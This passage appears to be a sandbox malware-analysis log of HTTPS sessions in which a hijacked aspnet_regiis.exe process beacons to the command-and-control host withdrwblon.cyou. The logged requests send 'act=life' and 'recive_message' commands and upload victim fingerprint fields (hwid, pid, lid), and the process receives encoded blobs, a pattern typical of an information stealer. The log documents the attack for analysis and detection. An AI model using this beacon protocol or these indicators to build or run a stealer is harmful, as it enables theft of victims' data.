2024-10-24 19:59:03 UTC	356	IN	Data Raw: 34 32 65 34 0d 0a 31 50 73 49 66 38 55 6a 66 4e 4c 6c 70 61 4d 2b 44 50 45 6f 64 6d 75 71 54 73 46 59 37 42 31 72 6a 4b 64 4c 2b 56 47 63 49 65 61 76 32 58 35 64 2f 78 64 51 38 4a 62 41 67 51 52 71 6b 45 51 46 44 6f 5a 73 6f 44 7a 4f 4a 77 33 74 79 7a 69 63 66 62 35 58 69 2f 62 42 62 68 36 70 55 42 6e 2b 78 38 44 62 48 44 61 71 55 31 51 4f 78 47 7a 37 65 6f 6c 33 43 65 33 4c 4b 5a 67 36 38 31 47 4b 74 35 4e 6b 47 4b 31 47 48 37 61 45 79 63 35 62 61 5a 52 4a 48 41 58 44 49 36 6b 31 7a 6a 46 4a 36 64 31 70 77 33 50 52 52 4a 4b 31 74 6d 6b 4d 72 67 45 42 2f 70 36 48 78 6c 41 75 79 77 6f 58 44 73 67 69 70 7a 79 48 64 51 50 6b 77 79 69 64 4f 2b 78 49 67 4c 79 54 61 68 75 73 54 42 61 69 69 63 50 4a 55 47 2b 65 53 56 52 48 69 43 75 37 65 74 59 2f 57 74 7a 47 4f Data Ascii: 42e41PsIf8UjfNLlpaM+DPEodmuqTsFY7B1rjKdL+VGcIeav2X5d/xdQ8JbAgQRqkEQFDoZsoDzOJw3tyzicfb5Xi/bBbh6pUBn+x8DbHDaqU1QOxGz7eol3Ce3LKZg681GKt5NkGK1GH7aEyc5baZRJHAXDI6k1zjFJ6d1pw3PRRJK1tmkMrgEB/p6HxlAuywoXDsgipzyHdQPkwyidO+xIgLyTahusTBaiicPJUG+eSVRHiCu7etY/WtzGO
2024-10-24 19:59:03 UTC	1369	IN	Data Raw: 4f 77 6c 63 2f 4b 56 32 75 42 51 52 30 45 78 53 79 75 4d 49 46 38 43 65 6e 50 49 35 51 35 2b 6b 36 4a 73 4a 6c 71 58 65 6b 42 47 61 6a 48 6e 34 46 2f 61 34 4e 4e 47 42 2b 4b 46 75 4d 6c 77 47 5a 4a 36 63 6c 70 77 33 50 32 52 6f 65 31 6b 6d 55 65 72 30 6f 4d 73 4a 58 42 7a 46 6c 38 6c 55 38 61 41 38 73 2b 71 54 53 49 66 41 44 6c 7a 43 79 63 4e 37 34 4e 78 4c 47 42 4b 6b 58 6e 59 42 4f 37 69 38 33 57 58 43 36 4d 42 41 31 4a 7a 79 44 6a 59 73 35 37 43 4f 72 45 4c 5a 55 39 2b 6b 2b 43 75 4a 52 6c 47 36 31 42 47 62 71 50 7a 38 42 52 5a 5a 78 4b 45 51 54 4d 4b 71 38 37 69 7a 39 48 72 73 49 78 32 32 75 2b 62 59 4f 31 69 79 67 6f 70 45 38 51 74 35 47 48 33 68 4a 33 30 30 30 59 53 5a 42 73 72 54 2b 42 62 51 6a 38 77 43 65 4a 50 2f 74 46 69 62 57 58 61 68 69 67 54 Data Ascii: Owlc/KV2uBQR0ExSyuMIF8CenPI5Q5+k6JsJlqXekBGajHn4F/a4NNGB+KFuMlwGZJ6clpw3P2Roe1kmUer0oMsJXBzFl8lU8aA8s+qTSIfADlzCycN74NxLGBKkXnYBO7i83WXC6MBA1JzyDjYs57COrELZU9+k+CuJRlG61BGbqPz8BRZZxKEQTMKq87iz9HrsIx22u+bYO1iygopE8Qt5GH3hJ3000YSZBsrT+BbQj8wCeJP/tFibWXahigT
2024-10-24 19:59:03 UTC	1369	IN	Data Raw: 48 33 68 4a 33 30 30 30 59 53 5a 42 73 72 7a 4f 4f 64 41 50 71 78 53 36 57 4e 76 31 45 68 37 75 65 59 42 4f 67 52 52 4b 35 69 73 48 42 57 32 71 57 57 42 45 41 78 43 44 6a 64 4d 35 34 45 61 36 64 61 62 51 30 36 45 43 72 74 59 68 6a 58 62 67 50 42 2f 43 41 79 34 45 45 4c 70 52 50 48 41 4c 4f 4a 4b 4d 6f 69 33 45 43 37 38 38 76 6d 6a 37 79 52 59 53 33 6d 57 77 52 70 30 59 5a 6f 70 58 43 78 30 35 6b 30 77 52 55 44 74 42 73 2b 33 71 34 62 78 37 2f 30 32 75 75 4d 50 42 4e 67 36 44 5a 64 56 4f 2b 41 52 6d 38 78 35 2b 42 56 32 36 66 54 52 77 50 7a 43 53 73 4e 59 64 74 43 4f 4c 4c 4f 35 77 7a 39 30 32 4c 75 70 42 6e 47 71 70 4b 46 4c 32 44 77 4d 41 63 49 4e 4e 4e 44 45 6d 51 62 4a 55 71 67 33 4d 6e 35 63 6b 67 32 79 79 77 57 73 53 78 6c 53 70 46 35 30 55 53 75 49 Data Ascii: H3hJ3000YSZBsrzOOdAPqxS6WNv1Eh7ueYBOgRRK5isHBW2qWWBEAxCDjdM54Ea6dabQ06ECrtYhjXbgPB/CAy4EELpRPHALOJKMoi3EC788vmj7yRYS3mWwRp0YZopXCx05k0wRUDtBs+3q4bx7/02uuMPBNg6DZdVO+ARm8x5+BV26fTRwPzCSsNYdtCOLLO5wz902LupBnGqpKFL2DwMAcINNNDEmQbJUqg3Mn5ckg2yywWsSxlSpF50USuI
2024-10-24 19:59:03 UTC	1369	IN	Data Raw: 61 35 64 4e 45 41 2f 48 62 4f 31 36 69 57 64 4a 74 6f 55 47 76 41 61 38 59 72 37 32 68 69 51 45 35 30 59 53 38 4e 2b 48 7a 56 39 69 6d 30 55 53 41 4d 51 6d 71 6a 47 43 64 41 33 69 7a 43 79 64 4d 76 74 47 68 62 4b 56 59 42 75 6b 51 68 47 2f 69 4d 2b 42 45 69 36 55 55 6c 52 52 69 41 6d 30 4d 59 42 35 53 66 47 4c 4d 4e 73 30 38 67 50 63 39 70 56 6a 47 36 46 45 45 72 47 42 7a 38 52 55 61 70 4a 4d 45 67 72 48 4b 4b 59 37 67 58 73 46 34 4d 38 6f 6d 6a 2f 31 54 49 2b 7a 32 53 52 64 6f 46 6c 65 36 4d 66 32 77 6b 70 35 67 30 5a 55 46 6f 59 31 34 7a 32 43 50 31 47 75 78 44 75 52 4f 66 42 47 69 37 4f 61 5a 52 71 71 52 78 4b 36 6a 73 2f 48 55 32 65 42 53 52 67 48 7a 79 4b 76 4e 49 4e 31 43 75 4f 46 5a 39 73 30 35 67 50 63 39 72 56 74 45 49 6c 4b 45 72 66 48 32 49 39 Data Ascii: a5dNEA/HbO16iWdJtoUGvAa8Yr72hiQE50YS8N+HzV9im0USAMQmqjGCdA3izCydMvtGhbKVYBukQhG/iM+BEi6UUlRRiAm0MYB5SfGLMNs08gPc9pVjG6FEErGBz8RUapJMEgrHKKY7gXsF4M8omj/1TI+z2SRdoFle6Mf2wkp5g0ZUFoY14z2CP1GuxDuROfBGi7OaZRqqRxK6js/HU2eBSRgHzyKvNIN1CuOFZ9s05gPc9rVtEIlKErfH2I9
2024-10-24 19:59:03 UTC	1369	IN	Data Raw: 68 4d 52 69 48 54 6a 44 49 6c 76 47 65 32 48 47 49 30 77 36 45 69 4a 75 74 6c 31 55 37 34 42 47 62 7a 48 6e 34 46 61 59 5a 70 4a 47 77 6a 42 49 4b 34 2f 68 33 6f 49 36 4d 45 6a 6b 54 50 34 52 59 57 7a 6b 32 6b 63 72 55 67 5a 75 49 44 45 30 78 77 67 30 30 30 4d 53 5a 42 73 69 6a 32 63 63 52 6d 75 32 6d 65 43 63 2f 6c 50 78 4f 37 5a 62 68 65 6f 52 52 6d 38 67 63 4c 48 55 57 2b 63 53 78 51 47 7a 43 65 71 50 49 39 79 44 4f 50 42 4f 35 45 34 38 55 2b 4e 75 70 51 71 55 2b 64 47 42 76 44 66 68 2f 42 52 59 4a 31 4e 41 6b 6e 58 59 72 70 36 69 58 4e 4a 74 6f 55 6f 6c 7a 7a 39 54 49 65 31 6d 47 41 50 74 55 30 58 75 49 4c 4c 79 6c 4a 6f 67 55 77 62 41 4d 73 76 71 6a 32 47 63 77 50 74 77 6d 6e 56 63 2f 6c 62 78 4f 37 5a 53 51 71 33 54 46 36 76 79 64 36 42 57 32 4c 54 Data Ascii: hMRiHTjDIlvGe2HGI0w6EiJutl1U74BGbzHn4FaYZpJGwjBIK4/h3oI6MEjkTP4RYWzk2kcrUgZuIDE0xwg000MSZBsij2ccRmu2meCc/lPxO7ZbheoRRm8gcLHUW+cSxQGzCeqPI9yDOPBO5E48U+NupQqU+dGBvDfh/BRYJ1NAknXYrp6iXNJtoUolzz9TIe1mGAPtU0XuILLylJogUwbAMsvqj2GcwPtwmnVc/lbxO7ZSQq3TF6vyd6BW2LT
2024-10-24 19:59:03 UTC	1369	IN	Data Raw: 6f 70 70 54 57 42 64 67 44 71 7a 53 71 62 4e 2f 70 45 67 62 57 56 59 52 71 6b 54 68 71 35 69 63 37 4f 48 43 44 54 54 51 78 4a 6b 47 79 43 49 59 31 7a 42 4b 37 61 5a 34 4a 7a 2b 55 2f 45 37 74 6c 6d 45 36 4a 42 46 4c 61 44 77 73 64 57 61 35 4e 42 46 77 62 4d 4b 71 63 31 6a 6e 51 41 37 38 4d 73 6b 54 6a 34 54 6f 65 77 6e 79 70 54 35 30 59 47 38 4e 2b 48 34 55 64 6a 6e 30 31 55 46 6f 59 31 34 7a 32 43 50 31 47 75 7a 69 57 66 4e 50 35 4f 68 37 36 63 62 68 65 69 51 52 61 69 6a 38 66 47 54 6e 79 54 51 78 45 46 79 79 79 6e 50 49 64 35 43 75 71 46 5a 39 73 30 35 67 50 63 39 72 52 6d 47 6f 35 47 42 66 43 59 69 64 67 63 61 5a 38 4b 54 45 6e 4a 4a 36 6b 31 67 33 77 50 37 63 34 73 6b 54 4c 35 53 34 6d 6b 6d 6d 55 53 6f 30 45 52 74 6f 48 47 7a 6c 70 70 6d 6b 73 63 44 Data Ascii: oppTWBdgDqzSqbN/pEgbWVYRqkThq5ic7OHCDTTQxJkGyCIY1zBK7aZ4Jz+U/E7tlmE6JBFLaDwsdWa5NBFwbMKqc1jnQA78MskTj4ToewnypT50YG8N+H4Udjn01UFoY14z2CP1GuziWfNP5Oh76cbheiQRaij8fGTnyTQxEFyyynPId5CuqFZ9s05gPc9rRmGo5GBfCYidgcaZ8KTEnJJ6k1g3wP7c4skTL5S4mkmmUSo0ERtoHGzlppmkscD
2024-10-24 19:59:03 UTC	1369	IN	Data Raw: 74 6e 30 45 33 36 64 38 6b 6e 53 54 76 44 35 47 31 6c 32 51 61 73 51 46 51 38 49 69 48 6d 57 55 75 32 77 6f 72 52 34 67 30 34 32 4c 4f 53 67 72 67 79 79 36 4e 49 72 4e 6b 6e 72 75 66 66 51 7a 6e 44 31 36 32 78 35 2b 52 45 69 36 58 57 31 52 52 6d 48 37 34 62 39 30 6f 57 62 7a 61 5a 34 4a 7a 36 41 50 63 35 4e 63 71 44 2b 63 5a 58 76 65 45 31 64 4e 61 62 59 56 4a 55 7a 66 32 41 71 51 38 69 33 67 5a 72 4f 73 69 6a 7a 53 2b 44 63 53 35 32 54 49 6b 35 77 6c 65 6a 38 6d 48 32 52 77 32 30 33 38 58 42 38 59 72 74 53 76 44 55 51 37 6f 77 43 36 4c 63 64 42 49 6b 4c 48 5a 4a 46 32 68 41 55 62 67 79 59 66 46 54 53 37 4c 47 6b 5a 53 6e 58 2f 30 61 74 78 67 52 2f 65 46 50 39 74 72 72 41 33 45 70 4e 6b 79 58 65 42 43 44 4b 4b 42 78 4e 64 66 4b 61 31 30 46 78 2f 46 49 36 Data Ascii: tn0E36d8knSTvD5G1l2QasQFQ8IiHmWUu2worR4g042LOSgrgyy6NIrNknruffQznD162x5+REi6XW1RRmH74b90oWbzaZ4Jz6APc5NcqD+cZXveE1dNabYVJUzf2AqQ8i3gZrOsijzS+DcS52TIk5wlej8mH2Rw2038XB8YrtSvDUQ7owC6LcdBIkLHZJF2hAUbgyYfFTS7LGkZSnX/0atxgR/eFP9trrA3EpNkyXeBCDKKBxNdfKa10Fx/FI6
2024-10-24 19:59:03 UTC	1369	IN	Data Raw: 55 61 37 77 4b 70 55 39 2b 56 57 56 2b 37 35 6b 47 71 5a 58 44 71 65 49 69 4f 39 71 54 39 4d 45 56 41 2b 49 64 50 46 30 7a 6e 73 59 72 70 31 35 79 57 69 72 45 4e 50 6d 79 33 56 54 76 67 45 49 38 4e 2b 56 6a 78 78 38 30 78 4a 55 54 73 73 2b 73 54 79 4e 61 51 71 70 2b 78 65 38 50 66 6c 43 6b 71 61 55 5a 6a 79 6b 55 42 53 4f 75 64 4c 43 55 6d 43 55 58 41 56 4a 68 6d 79 73 65 74 5a 47 53 61 61 46 46 74 56 7a 35 67 50 63 39 71 78 70 45 36 6c 47 43 4b 48 4b 34 4d 39 62 62 34 56 61 47 51 58 70 4c 37 49 77 7a 6a 46 4a 36 49 56 78 79 58 32 2b 52 35 58 32 77 54 70 50 2f 42 52 4e 35 39 65 56 33 68 4a 33 30 31 78 55 55 5a 70 69 34 79 6a 4f 4a 30 6d 70 78 6a 75 4a 4e 66 31 56 68 2f 47 6e 56 44 69 77 51 67 36 32 68 50 6e 2f 64 32 4b 56 54 51 34 4f 7a 67 71 44 65 73 41 Data Ascii: Ua7wKpU9+VWV+75kGqZXDqeIiO9qT9MEVA+IdPF0znsYrp15yWirENPmy3VTvgEI8N+Vjxx80xJUTss+sTyNaQqp+xe8PflCkqaUZjykUBSOudLCUmCUXAVJhmysetZGSaaFFtVz5gPc9qxpE6lGCKHK4M9bb4VaGQXpL7IwzjFJ6IVxyX2+R5X2wTpP/BRN59eV3hJ301xUUZpi4yjOJ0mpxjuJNf1Vh/GnVDiwQg62hPn/d2KVTQ4OzgqDesA
2024-10-24 19:59:03 UTC	1369	IN	Data Raw: 69 6d 56 4e 4c 34 4e 78 4b 37 5a 4d 6c 32 4b 55 78 6d 67 68 49 58 6b 5a 69 79 69 58 42 63 4a 78 69 76 6a 4a 63 42 6d 53 66 69 46 63 63 68 39 76 6c 48 45 37 74 6b 74 45 36 70 41 48 62 36 45 31 64 4e 61 62 59 56 4a 55 7a 66 32 41 36 67 37 6e 6e 49 59 34 38 45 2f 70 51 33 5a 52 59 47 78 70 31 51 71 74 6b 59 4f 38 71 48 45 31 31 38 75 33 51 6f 4d 53 5a 42 73 68 44 79 4c 65 45 6d 67 68 53 33 62 61 37 35 73 6a 37 65 4a 5a 77 79 71 52 51 6a 79 6f 4d 48 45 57 79 37 64 43 68 68 4a 6b 47 79 73 4b 34 6c 35 44 4f 6d 4a 4c 6f 45 30 76 67 33 45 75 4e 6b 79 58 61 68 51 47 62 61 43 77 49 31 61 59 4a 30 4b 43 30 66 52 62 4c 56 36 31 69 78 48 72 74 64 70 77 33 4f 35 54 59 6d 33 6d 6d 51 65 74 56 4d 59 73 35 48 45 68 6d 4a 51 73 31 6f 58 48 63 38 64 72 6a 36 59 61 67 72 2b Data Ascii: imVNL4NxK7ZMl2KUxmghIXkZiyiXBcJxivjJcBmSfiFcch9vlHE7tktE6pAHb6E1dNabYVJUzf2A6g7nnIY48E/pQ3ZRYGxp1QqtkYO8qHE118u3QoMSZBshDyLeEmghS3ba75sj7eJZwyqRQjyoMHEWy7dChhJkGysK4l5DOmJLoE0vg3EuNkyXahQGbaCwI1aYJ0KC0fRbLV61ixHrtdpw3O5TYm3mmQetVMYs5HEhmJQs1oXHc8drj6Yagr+

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49708	188.114.97.3	443	6432	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-24 19:59:04 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: withdrwblon.cyou
2024-10-24 19:59:04 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-24 19:59:04 UTC	1007	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 19:59:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=sntqqu9r2d350jr481er5khbgg; expires=Mon, 17 Feb 2025 13:45:43 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mH3N3HCpsAPwYTa1961KOYZ3MxSu1Qv1ZOWVUfx90OA5eSfeHESWVUIoOP76fNBuB0pFZaj5ijMXCUpnZq%2Fu%2BWzUCI8topqpz6nPBRyYW6RnWdLVfFVwvGae%2BXqiCkfqMIen"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7c8b954f26c86f-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1370&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=907&delivery_rate=2101596&cwnd=252&unsent_bytes=0&cid=6f95f0d43a93525c&ts=537&x=0"
2024-10-24 19:59:04 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-10-24 19:59:04 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49709	188.114.97.3	443	2316	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-24 19:59:04 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12836 Host: withdrwblon.cyou
2024-10-24 19:59:04 UTC	12836	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 41 44 33 44 43 38 46 46 37 44 42 43 34 46 31 34 36 34 37 37 37 30 38 38 34 44 43 35 46 33 42 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 40 71 6a 77 6f Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"7AD3DC8FF7DBC4F14647770884DC5F3B--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"HpOoIh--@qjwo
2024-10-24 19:59:05 UTC	1017	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 19:59:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=9g1f3qto7ha3htidj2nqkgd732; expires=Mon, 17 Feb 2025 13:45:44 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4nr9GQ%2Fdl4osoySjau4tr%2FX7mnuIGoYmnffvfB0hv4lDQu5E%2BP0Sj%2BFjRjo0ekIY1fhJQZ3ZtXoEgULZmhWGd%2FBzXv%2BRQ3TpvmnrgQ8pVOssntYvSnNKjmt%2FPlsDaMAlisAx"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7c8b974a47bf6b-ATL alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=18605&sent=9&recv=18&lost=0&retrans=0&sent_bytes=2838&recv_bytes=13776&delivery_rate=155398&cwnd=32&unsent_bytes=0&cid=4ed362689dac1a3a&ts=551&x=0"
2024-10-24 19:59:05 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 0d 0a Data Ascii: 11ok 173.254.250.71
2024-10-24 19:59:05 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49710	188.114.97.3	443	6200	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-24 19:59:04 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12836 Host: withdrwblon.cyou
2024-10-24 19:59:04 UTC	12836	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 41 44 33 44 43 38 46 46 37 44 42 43 34 46 31 34 36 34 37 37 37 30 38 38 34 44 43 35 46 33 42 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 40 71 6a 77 6f Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"7AD3DC8FF7DBC4F14647770884DC5F3B--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"HpOoIh--@qjwo
2024-10-24 19:59:05 UTC	1007	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 19:59:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=mme9767gefndjln73amavea7un; expires=Mon, 17 Feb 2025 13:45:44 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=spQRUYBGeXCmbvjCEWiZw4ZJm6tdCYiKwbO9Qgcw2%2FyVokLcUo3pwrYs%2Bo8CldbIWpS7LCqxqGIhJDNkMBXBLb6FTAAv1CSDXL3qkpfNvMoHFbjpINe0RHQZLSqgc6w2vfXq"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7c8b978f4abfff-ATL alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=19988&sent=8&recv=18&lost=0&retrans=0&sent_bytes=2838&recv_bytes=13776&delivery_rate=144836&cwnd=32&unsent_bytes=0&cid=74e43112c3d516fd&ts=549&x=0"
2024-10-24 19:59:05 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 0d 0a Data Ascii: 11ok 173.254.250.71
2024-10-24 19:59:05 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49711	188.114.97.3	443	6432	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-24 19:59:06 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 80 Host: withdrwblon.cyou
2024-10-24 19:59:06 UTC	80	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 40 71 6a 77 6f 31 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61 Data Ascii: act=recive_message&ver=4.0&lid=HpOoIh--@qjwo1&j=b9abc76ce53b6fc3a03566f8f764f5ea
2024-10-24 19:59:06 UTC	1007	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 19:59:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=697r916gclq60hsd89mpe24civ; expires=Mon, 17 Feb 2025 13:45:45 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RRlHCixmap6hW7rw99SBfWhzpoI1jN7NO8cepDumVmx0SEYTxhQQv%2FDsYx4L6Upf0t685Pu6HhI9TQwuwBHSp9XmJn6tXpx7l8LGPCcUqwGD2%2F%2BWwBLe7kN1VVeaxCQDvUDB"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7c8b9f18923aa6-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1185&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=980&delivery_rate=2522648&cwnd=251&unsent_bytes=0&cid=72e28fb051964d79&ts=499&x=0"
2024-10-24 19:59:06 UTC	362	IN	Data Raw: 32 35 63 38 0d 0a 71 64 51 44 43 56 32 32 68 59 68 38 38 36 45 4d 33 52 39 52 6e 78 53 37 37 38 57 35 46 4c 65 35 7a 61 50 76 6a 6b 73 37 46 63 66 53 39 6e 55 72 5a 34 4b 70 71 67 2b 57 67 7a 61 37 66 6a 33 73 63 5a 66 4e 70 4e 30 32 6a 64 2b 73 7a 35 7a 72 5a 78 6c 6a 71 6f 76 75 5a 57 67 78 78 65 43 6b 58 70 62 5a 4c 75 64 45 4b 72 31 78 31 63 33 2f 6d 33 48 64 32 36 7a 50 6a 65 38 67 56 47 57 72 79 72 78 76 62 6a 58 54 35 75 77 64 6e 38 78 70 75 48 6f 77 39 58 72 53 67 71 33 55 4e 70 75 62 71 4e 6e 4e 74 47 6c 32 63 4c 50 49 6d 57 4a 36 4e 70 54 34 70 41 66 52 78 47 4c 2f 4a 58 50 2b 63 64 6d 44 6f 39 31 2f 33 39 47 6c 78 34 7a 71 49 55 74 38 6f 63 47 38 59 57 30 30 32 65 2f 34 45 4a 58 4c 59 72 35 77 4d 4c 30 34 6d 59 71 2f 6d 79 36 56 69 4a 33 43 6e Data Ascii: 25c8qdQDCV22hYh886EM3R9RnxS778W5FLe5zaPvjks7FcfS9nUrZ4Kpqg+Wgza7fj3scZfNpN02jd+sz5zrZxljqovuZWgxxeCkXpbZLudEKr1x1c3/m3Hd26zPje8gVGWryrxvbjXT5uwdn8xpuHow9XrSgq3UNpubqNnNtGl2cLPImWJ6NpT4pAfRxGL/JXP+cdmDo91/39Glx4zqIUt8ocG8YW002e/4EJXLYr5wML04mYq/my6ViJ3Cn
